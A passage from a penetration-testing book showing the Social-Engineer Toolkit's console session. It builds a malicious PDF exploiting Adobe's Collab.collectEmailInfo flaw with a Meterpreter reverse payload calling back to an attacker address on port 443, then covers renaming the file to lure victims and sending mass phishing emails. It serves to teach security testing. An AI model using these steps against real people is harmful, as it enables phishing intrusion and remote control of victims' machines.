The Social-Engineer Toolkit
139
3. Windows Reverse VNC DLL
Spawn a VNC server on victim and send back to
attacker.
4. Windows Reverse TCP Shell (x64)
Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64),
Meterpreter
6. Windows Shell Bind_TCP (X64)
Execute payload and create an accepting port on
remote system.
7. Windows Meterpreter Reverse HTTPS
Tunnel communication over HTTP using SSL and use
Meterpreter.
Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.10.1.112:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.
As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
Enter your choice (enter for default):
1
Keeping the filename and moving on.
From the SET main menu, select
Spear-Phishing Attack Vectors
fol-
lowed by
Perform a Mass Email Attack
. This attack infects a PDF file using
the Adobe
Collab.collectEmailInfo
vulnerability , a Metasploit Meterpreter
reverse payload that is the SET default.
Collab.collectEmailInfo
is a heap-
based exploit that, if opened (and if the target’s version of Adobe Acrobat
is vulnerable to this exploit), will connect to the attacking workstation on
port 443, which usually allows outbound traffic from most networks.
You are also given the option of renaming the malicious file to make
it more enticing for the target to open. The default name (
template.pdf
) is
selected in this scenario for demonstration purposes.
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.